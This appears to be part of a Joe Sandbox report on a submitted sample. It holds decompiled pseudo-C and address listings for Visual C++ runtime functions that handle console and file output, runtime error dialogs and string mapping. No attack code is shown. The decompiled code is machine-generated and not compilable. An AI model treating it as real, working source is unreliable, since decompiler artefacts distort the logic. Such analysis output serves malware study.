													goto L86;
												}
												__eflags = _t316 - _v6864 - _a12;
											} while (_t316 - _v6864 < _a12);
											goto L86;
										}
										_t318 = _v6864;
										__eflags = _a12 - _t325;
										if(_a12 <= _t325) {
											goto L91;
										} else {
											goto L49;
										}
										do {
											L49:
											_t359 = 0;
											_t337 = _t318 - _v6864;
											__eflags = _t337;
											_t256 =  &_v6844;
											do {
												__eflags = _t337 - _a12;
												if(_t337 >= _a12) {
													break;
												}
												_t350 =  *_t318;
												_t318 = _t318 + 1;
												_t337 = _t337 + 1;
												_v6884 = _t318;
												__eflags = _t350 - 0xa;
												if(_t350 == 0xa) {
													_v6868 =  &(_v6868->Internal);
													 *_t256 = 0xd;
													_t256 =  &(_t256[0]);
													_t359 = _t359 + 1;
													__eflags = _t359;
												}
												 *_t256 = _t350;
												_t256 =  &(_t256[0]);
												_t359 = _t359 + 1;
												__eflags = _t359 - 0x13ff;
											} while (_t359 < 0x13ff);
											_t355 = _t256 -  &_v6844;
											_t262 = WriteFile( *(_t352 +  *_v6880),  &_v6844, _t355,  &_v6876, 0);
											__eflags = _t262;
											if(_t262 == 0) {
												goto L85;
											}
											_t263 = _v6876;
											_v6860 = _v6860 + _t263;
											__eflags = _t263 - _t355;
											if(_t263 < _t355) {
												goto L86;
											}
											__eflags = _t318 - _v6864 - _a12;
										} while (_t318 - _v6864 < _a12);
										goto L86;
									}
									__eflags = _t355;
									if(_t355 == 0) {
										L15:
										_t272 = GetConsoleCP();
										_t319 = _v6864;
										_v6884 = _t272;
										_v6872 = 0;
										__eflags = _a12;
										if(_a12 <= 0) {
											goto L87;
										}
										_v6852 = 0;
										do {
											_t274 = _v6853;
											__eflags = _t274;
											if(_t274 != 0) {
												__eflags = _t274 - 1;
												if(_t274 == 1) {
													L35:
													_t355 =  *_t319 & 0x0000ffff;
													__eflags = _t355 - 0xa;
													_t325 = 0 | _t355 == 0x0000000a;
													_t319 =  &(_t319[1]);
													_t81 =  &_v6852;
													 *_t81 = _v6852 + 2;
													__eflags =  *_t81;
													_v6848 = _t355;
													_v6888 = _t355 == 0xa;
													L36:
													__eflags = _t274 - 1;
													if(_t274 == 1) {
														L38:
														_t275 = E03007D97(_t325, _v6848);
														_pop(_t325);
														__eflags = _t275 - _v6848;
														if(_t275 != _v6848) {
															goto L85;
														}
														_v6860 = _v6860 + 2;
														__eflags = _v6888;
														if(_v6888 == 0) {
															goto L42;
														}
														_t277 = 0xd;
														_v6848 = _t277;
														_t278 = E03007D97(_t325, _t277);
														_pop(_t325);
														__eflags = _t278 - _v6848;
														if(_t278 != _v6848) {
															goto L85;
														}
														_v6860 = _v6860 + 1;
														_t94 =  &_v6868;
														 *_t94 =  &(_v6868->Internal);
														__eflags =  *_t94;
														goto L42;
													}
													__eflags = _t274 - 2;
													if(_t274 != 2) {
														goto L42;
													}
													goto L38;
												}
												__eflags = _t274 - 2;
												if(_t274 != 2) {
													goto L36;
												}
												goto L35;
											}
											_t341 =  *_t319;
											_t355 = _v6880;
											__eflags = _t341 - 0xa;
											_v6888 = 0 | _t341 == 0x0000000a;
											_t282 =  *_t355 + _t352;
											__eflags =  *(_t282 + 0x38);
											if( *(_t282 + 0x38) == 0) {
												_t284 = E03006B8D(_t341);
												__eflags = _t284;
												if(_t284 == 0) {
													_push(1);
													_push(_t319);
													L25:
													_push( &_v6848);
													_t286 = E03007EEF();
													_t362 = _t362 + 0xc;
													__eflags = _t286 - 0xffffffff;
													if(_t286 == 0xffffffff) {
														goto L86;
													}
													L26:
													_t319 =  &(_t319[0]);
													_v6852 = _v6852 + 1;
													_t355 = WideCharToMultiByte(_v6884, 0,  &_v6848, 1,  &_v16, 5, 0, 0);
													__eflags = _t355;
													if(_t355 == 0) {
														goto L86;
													}
													_t293 = WriteFile( *(_t352 +  *_v6880),  &_v16, _t355,  &_v6872, 0);
													__eflags = _t293;
													if(_t293 == 0) {
														goto L85;
													}
													_t325 = _v6868;
													_v6860 = _v6852 + _v6868;
													__eflags = _v6872 - _t355;
													if(_v6872 < _t355) {
														goto L86;
													}
													__eflags = _v6888;
													if(_v6888 == 0) {
														goto L42;
													}
													_v16 = 0xd;
													_t300 = WriteFile( *(_t352 +  *_v6880),  &_v16, 1,  &_v6872, 0);
													__eflags = _t300;
													if(_t300 == 0) {
														goto L85;
													}
													__eflags = _v6872 - 1;
													if(_v6872 < 1) {
														goto L86;
													}
													_v6868 =  &(_v6868->Internal);
													_v6860 = _v6860 + 1;
													goto L42;
												}
												__eflags = _v6864 - _t319 + _a12 - 1;
												if(_v6864 - _t319 + _a12 <= 1) {
													_t350 =  *_t319;
													_v6860 = _v6860 + 1;
													 *((char*)(_t352 +  *_t355 + 0x34)) =  *_t319;
													 *((intOrPtr*)(_t352 +  *_t355 + 0x38)) = 1;
													goto L86;
												}
												_t304 = E03007EEF( &_v6848, _t319, 2);
												_t362 = _t362 + 0xc;
												__eflags = _t304 - 0xffffffff;
												if(_t304 == 0xffffffff) {
													goto L86;
												}
												_t319 =  &(_t319[0]);
												_v6852 = _v6852 + 1;
												goto L26;
											}
											_t350 =  *((intOrPtr*)(_t282 + 0x34));
											_v16 =  *((intOrPtr*)(_t282 + 0x34));
											_v15 = _t341;
											 *(_t282 + 0x38) =  *(_t282 + 0x38) & 0x00000000;
											_push(2);
											_push( &_v16);
											goto L25;
											L42:
											__eflags = _v6852 - _a12;
										} while (_v6852 < _a12);
										goto L86;
									}
									__eflags = _v6853;
									if(_v6853 == 0) {
										goto L46;
									}
									goto L15;
								}
							}
							 *(E03003EB8()) =  *_t307 & 0x00000000;
							 *((intOrPtr*)(E03003EA5())) = 0x16;
							_t225 = E03003E53();
							goto L95;
						}
						__eflags = _t322 - 1;
						if(_t322 != 1) {
							goto L8;
						}
						goto L6;
					}
					 *(E03003EB8()) = 0;
					 *((intOrPtr*)(E03003EA5())) = 0x16;
					_t220 = E03003E53() | 0xffffffff;
					goto L98;
				}
				_t220 = 0;
				goto L98;
			}








































































    0x03005429
    0x03005429
    0x03005433
    0x03005438
    0x0300543f
    0x03005442
    0x03005446
    0x0300544a
    0x0300544c
    0x03005452
    0x03005458
    0x03005461
    0x0300546a
    0x0300546c
    0x03005494
    0x03005495
    0x0300549c
    0x030054a1
    0x030054aa
    0x030054ac
    0x030054b2
    0x030054b8
    0x030054bb
    0x030054c2
    0x030054c5
    0x030054c7
    0x030054ca
    0x030054e9
    0x030054e9
    0x030054ee
    0x030054f7
    0x030054fc
    0x030054fc
    0x03005500
    0x03005506
    0x03005508
    0x030057a7
    0x030057a7
    0x030057a7
    0x00000000
    0x0300550e
    0x03005510
    0x03005515
    0x00000000
    0x00000000
    0x0300551b
    0x03005525
    0x03005537
    0x03005539
    0x0300553f
    0x03005541
    0x03005543
    0x030057a9
    0x030057a9
    0x030057ab
    0x030057b0
    0x03005a6b
    0x03005a71
    0x03005a73
    0x03005a8a
    0x03005a90
    0x03005a96
    0x03005a96
    0x03005a9d
    0x03005b11
    0x03005b11
    0x03005b17
    0x03005b17
    0x03005b18
    0x03005b25
    0x03005b25
    0x03005a9f
    0x03005a9f
    0x03005aa6
    0x03005ad5
    0x03005adb
    0x03005add
    0x03005ae2
    0x03005af3
    0x03005af8
    0x03005afe
    0x03005b03
    0x03005b03
    0x03005b06
    0x03005b06
    0x00000000
    0x03005b06
    0x03005aea
    0x03005aed
    0x00000000
    0x00000000
    0x03005aef
    0x00000000
    0x03005aef
    0x03005aaa
    0x03005aab
    0x03005ab1
    0x03005acd
    0x03005ab3
    0x03005ab8
    0x03005abe
    0x03005ac3
    0x03005ac3
    0x00000000
    0x03005ab1
    0x03005a7b
    0x03005a82
    0x00000000
    0x03005a82
    0x030057b6
    0x030057bd
    0x030057c3
    0x03005871
    0x03005878
    0x03005951
    0x03005957
    0x0300595a
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x03005960
    0x03005960
    0x03005966
    0x0300596d
    0x0300596d
    0x03005975
    0x0300597b
    0x0300597c
    0x0300597c
    0x0300597f
    0x00000000
    0x00000000
    0x03005987
    0x0300598a
    0x03005990
    0x03005992
    0x03005995
    0x03005999
    0x0300599a
    0x0300599d
    0x0300599f
    0x0300599f
    0x0300599f
    0x0300599f
    0x030059a5
    0x030059ab
    0x030059ae
    0x030059b0
    0x030059b0
    0x030059bc
    0x030059d4
    0x030059e9
    0x030059eb
    0x030059ed
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x030059f3
    0x030059f3
    0x03005a14
    0x03005a1a
    0x03005a1c
    0x00000000
    0x00000000
    0x03005a1e
    0x03005a24
    0x03005a26
    0x00000000
    0x00000000
    0x03005a36
    0x03005a36
    0x03005a38
    0x00000000
    0x00000000
    0x00000000
    0x03005a38
    0x03005a30
    0x00000000
    0x03005a3a
    0x03005a40
    0x03005a46
    0x03005a4c
    0x03005a4c
    0x00000000
    0x03005a55
    0x0300587e
    0x03005884
    0x03005887
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0300588d
    0x0300588d
    0x0300588d
    0x03005896
    0x03005896
    0x0300589e
    0x030058a4
    0x030058a5
    0x030058a5
    0x030058a8
    0x00000000
    0x00000000
    0x030058aa
    0x030058ad
    0x030058af
    0x030058b1
    0x030058b7
    0x030058ba
    0x030058bc
    0x030058c4
    0x030058c5
    0x030058c8
    0x030058ce
    0x030058d0
    0x030058d0
    0x030058d0
    0x030058d0
    0x030058d6
    0x030058dc
    0x030058df
    0x030058e1
    0x030058e1
    0x030058f5
    0x03005913
    0x03005919
    0x0300591b
    0x00000000
    0x00000000
    0x03005921
    0x03005927
    0x0300592d
    0x0300592f
    0x00000000
    0x00000000
    0x0300593d
    0x0300593d
    0x00000000
    0x03005946
    0x030057c9
    0x030057cf
    0x030057d2
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x030057d8
    0x030057d8
    0x030057da
    0x030057dc
    0x030057dc
    0x030057e2
    0x030057e8
    0x030057e8
    0x030057eb
    0x00000000
    0x00000000
    0x030057ed
    0x030057ef
    0x030057f0
    0x030057f1
    0x030057f7
    0x030057fa
    0x030057fc
    0x03005802
    0x03005805
    0x03005806
    0x03005806
    0x03005806
    0x03005807
    0x03005809
    0x0300580a
    0x0300580b
    0x0300580b
    0x0300581b
    0x03005839
    0x0300583f
    0x03005841
    0x00000000
    0x00000000
    0x03005847
    0x0300584d
    0x03005853
    0x03005855
    0x00000000
    0x00000000
    0x03005863
    0x03005863
    0x00000000
    0x0300586c
    0x03005549
    0x0300554b
    0x03005559
    0x03005559
    0x0300555f
    0x03005565
    0x0300556d
    0x03005573
    0x03005576
    0x00000000
    0x00000000
    0x0300557c
    0x03005582
    0x03005582
    0x03005588
    0x0300558a
    0x030056f7
    0x030056f9
    0x030056ff
    0x030056ff
    0x03005704
    0x03005707
    0x0300570a
    0x0300570d
    0x0300570d
    0x0300570d
    0x03005714
    0x0300571a
    0x03005720
    0x03005720
    0x03005722
    0x03005728
    0x0300572e
    0x03005733
    0x03005734
    0x0300573b
    0x00000000
    0x00000000
    0x03005741
    0x03005748
    0x0300574f
    0x00000000
    0x00000000
    0x03005753
    0x03005755
    0x0300575b
    0x03005760
    0x03005761
    0x03005768
    0x00000000
    0x00000000
    0x0300576e
    0x03005774
    0x03005774
    0x03005774
    0x00000000
    0x03005774
    0x03005724
    0x03005726
    0x00000000
    0x00000000
    0x00000000
    0x03005726
    0x030056fb
    0x030056fd
    0x00000000
    0x00000000
    0x00000000
    0x030056fd
    0x03005590
    0x03005592
    0x0300559a
    0x030055a0
    0x030055a8
    0x030055aa
    0x030055ae
    0x030055c9
    0x030055cf
    0x030055d1
    0x0300560d
    0x0300560f
    0x03005610
    0x03005616
    0x03005617
    0x0300561c
    0x0300561f
    0x03005622
    0x00000000
    0x00000000
    0x03005628
    0x03005642
    0x03005643
    0x0300564f
    0x03005651
    0x03005653
    0x00000000
    0x00000000
    0x03005672
    0x03005678
    0x0300567a
    0x00000000
    0x00000000
    0x03005686
    0x0300568e
    0x03005694
    0x0300569a
    0x00000000
    0x00000000
    0x030056a0
    0x030056a7
    0x00000000
    0x00000000
    0x030056c4
    0x030056cb
    0x030056d1
    0x030056d3
    0x00000000
    0x00000000
    0x030056d9
    0x030056e0
    0x00000000
    0x00000000
    0x030056e6
    0x030056ec
    0x00000000
    0x030056ec
    0x030055e1
    0x030055e3
    0x03005790
    0x03005792
    0x03005798
    0x0300579e
    0x00000000
    0x0300579e
    0x030055f3
    0x030055f8
    0x030055fb
    0x030055fe
    0x00000000
    0x00000000
    0x03005604
    0x03005605
    0x00000000
    0x03005605
    0x030055b0
    0x030055b3
    0x030055b6
    0x030055b9
    0x030055bd
    0x030055c2
    0x00000000
    0x0300577a
    0x0300577d
    0x0300577d
    0x00000000
    0x03005789
    0x0300554d
    0x03005553
    0x00000000
    0x00000000
    0x00000000
    0x03005553
    0x03005508
    0x030054d1
    0x030054d9
    0x030054df
    0x00000000
    0x030054df
    0x030054bd
    0x030054c0
    0x00000000
    0x00000000
    0x00000000
    0x030054c0
    0x03005473
    0x0300547a
    0x03005485
    0x00000000
    0x03005485
    0x03005463
    0x00000000

    APIs
    • __getptd.LIBCMT ref: 0300551B
      • Part of subcall function 03004D40: __amsg_exit.LIBCMT ref: 03004D50
    • GetConsoleMode.KERNEL32(?,?), ref: 03005539
    • GetConsoleCP.KERNEL32 ref: 03005559
      • Part of subcall function 03006B8D: __isleadbyte_l.LIBCMT ref: 03006B97
    • __Stoull.NTSTC_LIBCMT ref: 030055F3
    • __Stoull.NTSTC_LIBCMT ref: 03005617
    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 03005649
    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 03005672
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 030056CB
      • Part of subcall function 03007D97: ___initconout.LIBCMT ref: 03007DA6
      • Part of subcall function 03007D97: WriteConsoleW.KERNEL32(FFFFFFFE,?,00000001,00000000,00000000), ref: 03007DC9
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03005839
    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03005913
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 030059E3
    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 03005A14
    • GetLastError.KERNEL32 ref: 03005A2A
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 03005A6B
    • GetLastError.KERNEL32(?,03005BBB,?,?,?,030098B8,00000010,03002FCE,?,?,00000001,?,?,?,?), ref: 03005A8A
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
      • Part of subcall function 030052BA: SetFilePointer.KERNEL32(00000000,?,00000000,030034EA,?,?,?,?,?,030054FC,?,00000000,00000000,00000002,?,00000001), ref: 030052FC
      • Part of subcall function 030052BA: GetLastError.KERNEL32(?,030054FC,?,00000000,00000000,00000002,?,00000001,?,?,03005BBB,?,?,?,030098B8,00000010), ref: 03005309
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 0300424F, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 148
    C-Code - Quality: 78%
    			E0300424F(void* __edx, void* _a4) {
				signed int _v8;
				struct HINSTANCE__* _v9;
				void _v508;
				long _v512;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				signed int _t23;
				short _t28;
				void* _t32;
				void* _t34;
				void* _t37;
				long _t38;
				void* _t39;
				struct HINSTANCE__* _t40;
				void* _t52;
				long _t53;
				void* _t54;
				signed int _t55;
				void* _t56;
				void* _t57;

				_t52 = __edx;
				_t18 =  *0x300bbe4; // 0x1979767b
				_v8 = _t18 ^ _t55;
				_t54 = _a4;
				_t53 = E03004229(_t54);
				_t40 = 0;
				_v512 = _t53;
				if(_t53 != 0) {
					if(E030076D8(3) == 1 || E030076D8(3) == 0 &&  *0x300b000 == 1) {
						_t54 = GetStdHandle(0xfffffff4);
						if(_t54 != _t40 && _t54 != 0xffffffff) {
							_t23 = 0;
							while(1) {
								 *((char*)(_t55 + _t23 - 0x1f8)) =  *((intOrPtr*)(_t53 + _t23 * 2));
								if( *((intOrPtr*)(_t53 + _t23 * 2)) == _t40) {
									break;
								}
								_t23 = _t23 + 1;
								if(_t23 < 0x1f4) {
									continue;
								}
								break;
							}
							_v9 = _t40;
							_t20 = WriteFile(_t54,  &_v508, E03002C60( &_v508),  &_v512, _t40);
						}
					} else {
						if(_t54 != 0xfc) {
							_t53 = 0x300be08;
							_t28 = E03007675(0x300be08, 0x314, L"Runtime Error!\n\nProgram: ");
							_t57 = _t56 + 0xc;
							if(_t28 != 0) {
								_push(_t40);
								_push(_t40);
								_push(_t40);
								_push(_t40);
								_push(_t40);
								goto L9;
							} else {
								_t54 = 0x300be3a;
								 *0x300c042 = _t28;
								_t38 = GetModuleFileNameW(_t40, 0x300be3a, 0x104);
								_t40 = 0x2fb;
								if(_t38 == 0) {
									_t39 = E03007675(0x300be3a, 0x2fb, L"<program name unknown>");
									_t57 = _t57 + 0xc;
									if(_t39 != 0) {
										L8:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L9:
										E03003E01();
									}
								}
							}
							if(E0300765A(_t54) + 1 > 0x3c) {
								_t40 = _t40 - (0x300bdc4 + E0300765A(_t54) * 2 - _t54 >> 1);
								_t37 = E0300758D(0x300bdc4 + E0300765A(_t54) * 2, _t40, L"...", 3);
								_t57 = _t57 + 0x14;
								if(_t37 != 0) {
									goto L8;
								}
							}
							_t54 = 0x314;
							_t32 = E03007518(_t53, 0x314, L"\n\n");
							_t57 = _t57 + 0xc;
							if(_t32 != 0) {
								goto L8;
							}
							_t34 = E03007518(_t53, 0x314, _v512);
							_t57 = _t57 + 0xc;
							if(_t34 != 0) {
								goto L8;
							}
							_t20 = E030073AC(_t52, _t53, L"Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return E03006BA0(_t20, _t40, _v8 ^ _t55, _t52, _t53, _t54);
			}

























    0x0300424f
    0x0300425a
    0x03004261
    0x03004266
    0x03004270
    0x03004272
    0x03004275
    0x0300427d
    0x0300428e
    0x030043a3
    0x030043a7
    0x030043ae
    0x030043b0
    0x030043b3
    0x030043be
    0x00000000
    0x00000000
    0x030043c0
    0x030043c6
    0x00000000
    0x00000000
    0x00000000
    0x030043c6
    0x030043d7
    0x030043e9
    0x030043e9
    0x030042ad
    0x030042b3
    0x030042c3
    0x030042c9
    0x030042ce
    0x030042d3
    0x03004391
    0x03004392
    0x03004393
    0x03004394
    0x03004395
    0x00000000
    0x030042d9
    0x030042de
    0x030042e5
    0x030042eb
    0x030042f1
    0x030042f8
    0x03004301
    0x03004306
    0x0300430b
    0x0300430d
    0x0300430f
    0x03004310
    0x03004311
    0x03004312
    0x03004313
    0x03004314
    0x03004314
    0x03004314
    0x0300430b
    0x030042f8
    0x03004324
    0x03004340
    0x03004344
    0x03004349
    0x0300434e
    0x00000000
    0x00000000
    0x0300434e
    0x03004355
    0x0300435c
    0x03004361
    0x03004366
    0x00000000
    0x00000000
    0x03004370
    0x03004375
    0x0300437a
    0x00000000
    0x00000000
    0x03004387
    0x0300438c
    0x030042b3
    0x0300428e
    0x030043fd

    APIs
    • GetModuleFileNameW.KERNEL32(00000000,0300BE3A,00000104,00000001,00000000,?), ref: 030042EB
      • Part of subcall function 03003E01: GetCurrentProcess.KERNEL32(C0000417,03002BF3), ref: 03003E17
      • Part of subcall function 03003E01: TerminateProcess.KERNEL32(00000000), ref: 03003E1E
    • _wcslen.LIBCMT ref: 0300431A
    • _wcslen.LIBCMT ref: 03004327
      • Part of subcall function 030073AC: LoadLibraryW.KERNEL32(USER32.DLL), ref: 030073E7
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 03007403
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007414
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 03007421
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007424
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 03007431
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007434
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 03007441
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007444
      • Part of subcall function 030073AC: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 03007455
      • Part of subcall function 030073AC: EncodePointer.KERNEL32(00000000), ref: 03007458
      • Part of subcall function 030073AC: DecodePointer.KERNEL32(00000000,0300BE08,00000314,00000000), ref: 0300747A
      • Part of subcall function 030073AC: DecodePointer.KERNEL32 ref: 03007484
      • Part of subcall function 030073AC: DecodePointer.KERNEL32(?,0300BE08,00000314,00000000), ref: 030074C3
      • Part of subcall function 030073AC: DecodePointer.KERNEL32(?), ref: 030074DD
      • Part of subcall function 030073AC: DecodePointer.KERNEL32(0300BE08,00000314,00000000), ref: 030074F1
    • GetStdHandle.KERNEL32(000000F4,00000001,00000000,?), ref: 0300439D
    • _strlen.LIBCMT ref: 030043DA
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 030043E9
      • Part of subcall function 03006BA0: IsDebuggerPresent.KERNEL32 ref: 03008C43
      • Part of subcall function 03006BA0: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 03008C58
      • Part of subcall function 03006BA0: UnhandledExceptionFilter.KERNEL32(03002930), ref: 03008C63
      • Part of subcall function 03006BA0: GetCurrentProcess.KERNEL32(C0000409), ref: 03008C7F
      • Part of subcall function 03006BA0: TerminateProcess.KERNEL32(00000000), ref: 03008C86
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1453782213.03001000.00000020.sdmp, Offset: 03000000, based on PE: true
    • Associated: 00000001.00000002.1453773664.03000000.00000002.sdmp
    • Associated: 00000001.00000002.1453789983.0300B000.00000004.sdmp
    • Associated: 00000001.00000002.1453799273.03014000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_3000000_obtG43AWHP.jbxd
    Function 0300818A, Relevance: 12.2, APIs: 8, Instructions: 190
    C-Code - Quality: 79%
    			E0300818A(intOrPtr* _a4, int _a8, signed int _a12, char* _a16, int _a20, short* _a24, int _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				int _v16;
				int _v20;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t67;
				int _t73;
				short* _t75;
				short* _t77;
				short* _t78;
				signed int _t81;
				void* _t83;
				int _t84;
				int _t86;
				signed int _t88;
				void* _t90;
				short* _t91;
				char* _t96;
				int _t99;
				signed int _t108;
				signed int _t109;
				int _t112;
				signed int _t113;
				signed int _t115;
				int _t116;

				_t67 =  *0x300bbe4; // 0x1979767b
				_v8 = _t67 ^ _t115;
				_t109 = _a20;
				if(_t109 <= 0) {
					L8:
					_v12 = 0;
					if(_a32 == 0) {
						_a32 =  *((intOrPtr*)( *_a4 + 4));
					}
					_t114 = MultiByteToWideChar;
					_t112 = MultiByteToWideChar(_a32, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _a20, 0, 0);
					_v20 = _t112;
					if(_t112 != 0) {
						if(__eflags <= 0) {
							L21:
							_v16 = 0;
							L22:
							__eflags = _v16;
							if(_v16 == 0) {
								goto L11;
							}
							_t75 = MultiByteToWideChar(_a32, 1, _a16, _a20, _v16, _t112);
							__eflags = _t75;
							if(_t75 == 0) {
								L45:
								E0300816A(_v16);
								_t73 = _v12;
								goto L46;
							}
							_t114 = LCMapStringW;
							_t77 = LCMapStringW(_a8, _a12, _v16, _t112, 0, 0);
							_v12 = _t77;
							__eflags = _t77;
							if(_t77 == 0) {
								goto L45;
							}
							__eflags = _a12 & 0x00000400;
							if((_a12 & 0x00000400) == 0) {
								_t113 = _v12;
								__eflags = _t113;
								if(_t113 <= 0) {
									L37:
									_t112 = 0;
									__eflags = 0;
									L38:
									__eflags = _t112;
									if(_t112 != 0) {
										_t78 = LCMapStringW(_a8, _a12, _v16, _v20, _t112, _v12);
										__eflags = _t78;
										if(_t78 != 0) {
											_push(0);
											_push(0);
											__eflags = _a28;
											if(_a28 != 0) {
												_push(_a28);
												_push(_a24);
											} else {
												_push(0);
												_push(0);
											}
											_v12 = WideCharToMultiByte(_a32, 0, _t112, _v12, ??, ??, ??, ??);
										}
										E0300816A(_t112);
									}
									goto L45;
								}
								_t81 = 0xffffffe0;
								_t109 = _t81 % _t113;
								__eflags = _t81 / _t113 - 2;
								if(_t81 / _t113 < 2) {
									goto L37;
								}
								_t83 = _t113 + _t113 + 8;
								__eflags = _t83 - 0x400;
								if(_t83 > 0x400) {
									_t84 = E030089C5(_t109, _t113, LCMapStringW, _t83);
									__eflags = _t84;
									if(_t84 != 0) {
										 *_t84 = 0xdddd;
										_t84 = _t84 + 8;
										__eflags = _t84;
									}
									_t112 = _t84;
									goto L38;
								}
								E03009200(_t83);
								_t112 = _t116;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L45;
								}
								 *_t112 = 0xcccc;
								_t112 = _t112 + 8;
								goto L38;
							}
							_t86 = _a28;
							__eflags = _t86;
							if(_t86 != 0) {
								__eflags = _v12 - _t86;
								if(_v12 <= _t86) {
									LCMapStringW(_a8, _a12, _v16, _t112, _a24, _t86);
								}
							}
							goto L45;
						}
						_t88 = 0xffffffe0;
						_t109 = _t88 % _t112;
						__eflags = _t88 / _t112 - 2;
						if(_t88 / _t112 < 2) {
							goto L21;
						}
						_t24 = _t112 + 8; // 0x8
						_t90 = _t112 + _t24;
						__eflags = _t90 - 0x400;
						if(_t90 > 0x400) {
							_t91 = E030089C5(_t109, _t112, MultiByteToWideChar, _t90);
							__eflags = _t91;
							if(_t91 == 0) {
								L20:
								_v16 = _t91;
								goto L22;
							}
							 *_t91 = 0xdddd;
							L19:
							_t91 =  &(_t91[4]);
							__eflags = _t91;
							goto L20;
						}
						E03009200(_t90);
						_t91 = _t116;
						__eflags = _t91;
						if(_t91 == 0) {
							goto L20;
						}
						 *_t91 = 0xcccc;
						goto L19;
					} else {
						L11:
						_t73 = 0;
						L46:
						return E03006BA0(_t73, 0, _v8 ^ _t115, _t109, _t112, _t114);
					}
				} else {
					_t96 = _a16;
					_t108 = _t109;
					while(1) {
						_t108 = _t108 - 1;
						if( *_t96 == 0) {
							break;
						}
						_t96 =  &(_t96[1]);
						if(_t108 != 0) {
							continue;
						} else {
							_t108 = _t108 | 0xffffffff;
							break;
						}
					}
					_t99 = _t109 - _t108 - 1;
					if(_t99 < _t109) {
						_t99 = _t99 + 1;
					}
					_a20 = _t99;
					goto L8;
				}
			}































    0x03008192
    0x03008199
    0x0300819c
    0x030081a6
    0x030081c7
    0x030081c7
    0x030081cd
    0x030081d7
    0x030081d7
    0x030081da
    0x030081fd
    0x030081ff
    0x03008204
    0x0300820d
    0x03008252
    0x03008252
    0x03008255
    0x03008255
    0x03008258
    0x00000000
    0x00000000
    0x03008269
    0x0300826b
    0x0300826d
    0x03008353
    0x03008356
    0x0300835b
    0x00000000
    0x0300835e
    0x03008273
    0x03008285
    0x03008287
    0x0300828a
    0x0300828c
    0x00000000
    0x00000000
    0x03008297
    0x0300829a
    0x030082c5
    0x030082c8
    0x030082ca
    0x0300830e
    0x0300830e
    0x0300830e
    0x03008310
    0x03008310
    0x03008312
    0x03008324
    0x03008326
    0x03008328
    0x0300832a
    0x0300832b
    0x0300832c
    0x0300832f
    0x03008335
    0x03008338
    0x03008331
    0x03008331
    0x03008332
    0x03008332
    0x03008349
    0x03008349
    0x0300834d
    0x03008352
    0x00000000
    0x03008312
    0x030082d0
    0x030082d1
    0x030082d3
    0x030082d6
    0x00000000
    0x00000000
    0x030082d8
    0x030082dc
    0x030082de
    0x030082f7
    0x030082fd
    0x030082ff
    0x03008301
    0x03008307
    0x03008307
    0x03008307
    0x0300830a
    0x00000000
    0x0300830a
    0x030082e0
    0x030082e5
    0x030082e7
    0x030082e9
    0x00000000
    0x00000000
    0x030082eb
    0x030082f1
    0x00000000
    0x030082f1
    0x0300829c
    0x0300829f
    0x030082a1
    0x030082a7
    0x030082aa
    0x030082be
    0x030082be
    0x030082aa
    0x00000000
    0x030082a1
    0x03008213
    0x03008214
    0x03008216
    0x03008219
    0x00000000
    0x00000000
    0x0300821b
    0x0300821b
    0x0300821f
    0x03008224
    0x0300823a
    0x03008240
    0x03008242
    0x0300824d
    0x0300824d
    0x00000000
    0x0300824d
    0x03008244
    0x0300824a
    0x0300824a
    0x0300824a
    0x00000000
    0x0300824a
    0x03008226
    0x0300822b
    0x0300822d
    0x0300822f
    0x00000000
    0x00000000
    0x03008231
    0x00000000
    0x03008206
    0x03008206
    0x03008206
    0x0300835f
    0x03008370
    0x03008370
    0x030081a8
    0x030081a8
    0x030081ab
    0x030081ad
    0x030081ad
